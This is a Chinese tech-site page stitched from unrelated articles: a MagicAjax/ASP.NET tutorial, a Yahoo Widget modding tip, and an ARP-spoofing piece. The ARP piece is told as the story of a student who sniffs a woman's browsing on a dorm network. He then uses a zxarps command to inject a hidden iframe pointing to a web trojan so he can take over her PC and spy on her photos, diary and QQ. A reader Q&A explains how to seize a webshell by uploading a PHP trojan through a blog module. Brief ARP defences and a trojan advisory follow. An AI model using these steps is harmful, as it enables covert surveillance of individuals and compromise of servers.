什么是ajax

　　Ajax是当前Web设计的一个热点。这种借助JavaScript、DHTML等技术与服务器进行异步通信的技术，不仅被贴上了Web 2.0的时髦标签，而且成了某些网站炫耀技术实力的道具。当然更多的网站是利用Ajax技术来构建动态性更好、响应更灵敏的Web应用，从而大大改善用户的网络体验。www.sq120.com推荐文章

　　尽管Ajax并非一种全新技术，但它的实现较为复杂，涉及XHTML和CSS的表示、Document Object Model的动态显示和交互、XMLHttpRequest与服务器的异步通信以及通过JavaScript进行绑定等诸多方面，要全面掌握殊为不易。好在有麻烦的地方往往有活雷锋，在软件领域尤其如此。

　　MagicAjax.NET（可在http://sourceforge.net/projects/magicajax/下载）和wwHoverPanel AJAX Control for ASP.NET（可在http://www.west-wind.com下载）就是两个优秀的.Net组件，利用它们可在.Net框架上轻松实现Ajax功能。下面以MagicAjax.NET的Net 2.0平台版本为例，介绍如何在Visual Studio 2005中设计Ajax网页。

一、将Ajax组件加入Visual Studio 2005
　　由于Visual Studio 2005已全面支持Net 2.0平台，因此宜加载MagicAjax组件的Net 2.0版本。wwW.iTCOmpUter.COM.CN将下载的软件包解压，然后启动Visual Studio 2005，点击左侧栏的Toolbox页，滑出Toolbox面板。
　　在其上任何一项上右击，在弹出的菜单中选择“Choose Items”项，或者直接选择“Tools→Choose Toolbox Items”菜单，出现组件选择对话框。
　　点击Browse按钮，选择MagicAjax文件夹下的MagicAjax.dll文件，将AjaxPanel和AjaxZone两个MagicAjax组件加入到组件栏中。
二、在ASP.NET网页中使用AjaxPanel容器
　　MagicAjax主要通过AjaxPanel组件来实现Ajax功能。它是一种容器组件，只要把各种网页元素放置其中就可使它们具有Ajax功能。
　　提示：尽管MagicAjax在处理某些网页元素时尚有瑕疵，但以如此简单的方式即可使普通ASP.NET网页贴上Ajax标签，MagicAjax确实“神奇”。
　　在Visual Studio 2005中，选择“File→New→Web Site”菜单，在弹出的对话框中选择“ASP.NET Web Site”项，即可生成ASP.NET应用框架。然后将网页设计模式切换到Design，再把Toolbox面板上的AjaxPanel组件拖到网页上，并用拖动边框的方式调整其位置和大小。
　　要使AjaxPanel组件起作用，必须将一些定义项加入到web.config中，以使MagicAjax能被正确识别和调用。
　　首先，要在web.config的开头加入tag前缀：“<%@ Register TagPrefix="ajax" Namespace="MagicAjax.UI.Controls" Assembly="MagicAjax" %>”（不含引号，下同），将MagicAjax在命名空间里进行注册。当然，在<controls>段直接定义也行，只须加入“<add amespace="MagicAjax.UI.Controls" assembly="MagicAjax" tagPrefix="ajax"/>”即可。
　　然后，在<configSections>段中加入“<section name="magicAjax" type="MagicAjax.Configuration.MagicAjaxSectionHandler, MagicAjax"/>”。
　　最后，在<httpModules>段中加入“<add name="MagicAjaxModule" type="MagicAjax.MagicAjaxModule, MagicAjax"/>”。如此处理后，就可以在AjaxPanel容器里加入各种网页元素了。
三、在AjaxPanel中放入Gridview组件
　　为了试验MagicAjax的效果，这里将数据显示组件Gridview拖入到AjaxPanel容器中。Visual Studio 2005对数据显示和编辑组件作了改进，将它们同数据访问组件进行了绑定，使之可以直接连接数据库，减少了中间环节。选择“Tools→Connect to Database”菜单，出现数据源配置向导。利用该向导，便可选择数据库并设置数据筛选条件。配置好后，数据即出现在Gridview中。
　　而Gridview的外观式样亦可通过它的诸多属性来设计和调整。如果要更改数据源配置，只须右击Gridview下方的AccessDataSource控件，在弹出的菜单中选择“Configure Data Source”即可。
　　ASP.NET网页设计好后，选择“File→View in Browser”，即可对Web Site进行浏览。不难看出，数据显示已有了Ajax功能：翻页时，只有数据部分进行了刷新，而网页其它部分则原封不动。而需变才变恰是Ajax最具魅力和最受青睐的地方。
　　不难看出，MagicAjax极大地简化了Ajax设计，使程序员和网页设计师从繁琐的编码中解脱出来，而Ajax也快速地从“独门秘笈”演变为大众化技术。可以预言，在MagicAjax等的帮助下，网间将遍开Ajax花。
　　

 
widget是什么

　　最近有网友咨询，widget是什么？简单地说，Widget是雅虎开发的一个基于网络、可以独立在桌面运行的实用小工具。它可以使用户的桌面更漂亮，可以随时在桌面上监视电脑硬件的工作状况，可以在桌面上看到当天的天气预报，可以在桌面上设置日程安排提醒功能......更值得一提的是，用户不需要什么高深的技巧就可以轻松制作出一个有趣的Widget。在美国及中国台湾，Widget已经成为网络新生代最喜欢的对象，数千个诞生自民间的Widget已经在网民间流行开来。在雅虎Widget中文官方网站上还推荐了超过200个特色Widget下载，这些Widget只需要经过简单修改，就可以打上用户自己的专属LOGO。www.sq120.com推荐文章

　　本次大赛期间，我们还会通过系列实用技术文章教大家制作或修改Widget。本期，我们先来看一个最简单的例子，同时也能加深你对Widget的认识。
　　“伟大的意大利的左后卫，他继承了意大利的光荣的传统，法切蒂、卡布里迪、马尔蒂尼在这一刻灵魂附体……”这一段世界杯绝吼已经听得很耳熟了吧？但你是否能想到会有一个漫画版黄解说，在你的桌面上用Rap秀出这段激情解说？近来风靡全球的雅虎Widget就能带给你这样的新鲜体验。

　　既然制作Widget这么容易，就让我们自己亲自动手制作一个有趣的Widget吧。这次我们用的招数叫 “乾坤大挪移”。 还是以“黄大吼”这个好玩的Widget为例，我们要把“野兽”派黄健翔的照片换成漂亮的林志玲姐姐。首先，我们用Winrar软件将其解压缩，Widget的内部结构便一览无余了。
　
　　在解压后的文件夹里，你可以看到所有Widget的所需图片，我们现在只需要将其中黄健翔的照片文件，用一张同样文件名的林志玲照片覆盖掉。再把修改后的文件整体打包，压缩成Zip格式。最后，改变文件扩展名，将“Zip”换成“Widget”就大功告成了！需要注意的是，千万不要改变文件夹的层次结构，否则会导致修改后的文件无法运行。现在，你就可以在桌面上看漂亮的志玲姐姐用鸭公嗓咆哮世界杯了，是不是很恶搞？

 
什么是arp欺骗

　　什么是arp欺骗？先来看个故事吧。
        开学了，无视那些校园里的谈情说爱，我继续我的黑客学习，在网络中找寻到挑战的快感。但是就在昨天，一个偶然的擦肩而过激活了我的荷尔蒙。她是那么的美丽，在飘满饭菜味的食堂中我仍然隐约地闻到了与她擦肩而过时飘来的淡淡茉莉香。她是谁？以前怎么没见过？
　　虽然宿舍的弟兄们一直嘲笑我是故意的，但我仍然认为是上帝的手推了我一把。我拿起饭盒从座位上站起来绕过她身边的那一刻，仅仅是想看看她桌子上的课本封皮，好确认她学的是什么专业。但是不知道哪个该死的，把一碗黏糊糊的粥洒在了地上，无意中踩到，我很英俊地摔倒了，饭盆和里面的剩菜以标准的抛物线落在她的脖子上。
　　随后事情的发展进度超出了我的想象力，我们很快地就交换了姓名、专业、宿舍号码等私人信息，当然最后她也告诉我，她身上穿的那个印着卡通熊的衣服叫TeenieWeenie，一周前她父亲买给她的，价值2180元……唉，女人的衣服……怎么这么贵？
　　不管怎么样，我现在都是负资产了，信用卡严重透支，虽然我知道了她的宿舍号码和姓名，但是价格也太贵了点儿吧。于是我决定，通过宿舍楼局域网，入侵她的电脑，将木马植入到她的电脑中，翻看她的照片，偷看她的日记，监视她的QQ，我太坏了。不过想想那2180元，我认为我有这个权利！
　　我坐在电脑前思索了许久，最终我决定用ARP欺骗敲开她电脑的大门。ARP是一种地址解析协议，该协议用来解决一个节点上的下一跳IP地址到MAC地址的转换。ARP欺骗就是截获网关数据或者伪造网关发送虚假数据的技术，以达到制造网络通讯混乱的目的。
局域网中寻找她
　　几经努力，我得知她宿舍的几台电脑都是一个人帮忙配的，电脑名称默认设置的是宿舍门号加姓名拼音。于是，我准备用网络监控软件Active Wall（软件下载地址：http://www.cpcw.com/bzsoft）嗅探她的位置。
　　软件启动后，自动扫描嗅探出了局域网所有电脑，主界面中还会显示出每台电脑的名字和发送接收字节的多少（图1）。根据“电脑名称”找到了正在上网的她。

偷看她的上网记录
　　我决定拦截她的访问信息，看看她上网都干了什么。点击“分组管理”中的“策略配置”，选择“HTTP过滤”选项。在新弹出的“HTTP过滤配置”对话框的“网址”页面中输入“*”号，接着在“策略规则”选项中选择“通过并记录”（图2）。

　　我之所以不在网址一栏中输入具体的网址，是因为用“*”号通配符可以知道她访问的所有网站，而不会局限于某个网站。20分钟后嗅探出的所有内容显示在“事件记录”中，我将嗅探出的网址日志复制导出，对她的浏览习惯进行了大致的分析，在这段时间里她先后登录了学校教务网站、新浪博客、Qzone、某时尚杂志网等。
成功掌控她的电脑
　　想要利用ARP欺骗实现在她的电脑中植入木马的目的，仅仅通过Active Wall嗅探是无法实现的。真正的战斗必须准备几样专业的ARP欺骗工具，分别是网络访问系统工具Winpcap、ARP欺骗工具Zxarps、网页木马。
　　然后我打开Windows自带的记事本，在记事本中写入“zxarps.exe -idx 0 -ip 192.168.1.8-192.168.1.11（需要欺骗的IP地址段，根据实际情况修改）-port 80 -insert " ＜iframe src='网页木马地址' width=0 height=0＞" ”，再点击记事本的“另存为”，将内容另存为.bat格式的文件，并将该文件与Zxarps保存在同一个目录中。
　　批处理运行后，Zxarps迅速将＜iframe src='网页木马地址' width=0 height=0＞这段代码插入到指定的远程电脑浏览的每一个网页中（图3）。十五分钟之后，标有她名字的电脑出现在我的木马监控端中。也许从我和她相遇的那一刻起一切都是偶然，但是我相信，所谓偶然，只不过是我们对复杂的命运的无知罢了……

巧妙抵御ARP欺骗攻击
　　从去年开始，ARP欺骗攻击就开始流行起来。要防御这种攻击，我们可以使用MAC绑定法来解决问题。首先在命令提示符下输入“Ipconfig/all”，然后继续在命令提示符下输入命令“ARP -s IP MAC”，就可以将MAC地址和IP地址捆绑在一起了。
　　这样，就不会出现IP地址被盗用，不能正常使用校园网的情况了，从而有效保证电脑的安全。不过对于某些IP地址不固定的校园网来说，最好的方法仍然是使用专业的ARP防欺骗软件，例如AntiArp（软件下载地址：http://www.cpcw.com/bzsoft）。
回音壁
　　读者 汪冰：看过上期的《买论坛点券“附送”管理员权限》之后，我成功地进入了网站的管理后台，但是我在尝试取得WebShell的控制权时总是没有办法成功，请问要取得WebShell的控制权有什么诀窍？
　　小新分析：在某些支持PHP环境的服务器中，可以通过修改“论坛博客”模块中的文件设置，将PHP作为新后缀添加上，然后再通过Blog文章发布功能将你的PHP木马上传就可以了。这种夺取WebShell的控制权的方法要求对方的服务器必须是支持ASP和PHP两种解析方式的服务器。
一周病毒焦点：线上游戏窃取者变种竟会关闭扬声器
　　警惕程度：★★★
　　危害指数：★★★
　　瑞星监测网监测到线上游戏窃取者变种LUF（Trojan.PSW.Win32.GameOL.luf）病毒在网络上大肆传播。它是一个用VC语言编写的木马。运行后，首先将系统的扬声器设置成静音，避免杀毒软件和安全工具发出警告声响，并试图关闭多种主流杀毒软件和安全工具。
　　然后它将自身复制到系统目录下，修改注册表启动项实现开机自启动。同时，还会加载到所有进程中，在后台监视和窃取用户网游账号、密码等信息，并发送到黑客指定的邮箱使玩家蒙受损失。
　　清除方法：使用最新病毒库的杀毒软件查杀，例如瑞星的病毒库要升级到20.35版。此外，我们可以使用能保护网游账号和密码的一些专用工具，防止它们被病毒窃取。

 
From:http://www.itcomputer.com.cn/Article/Software/201309/336.html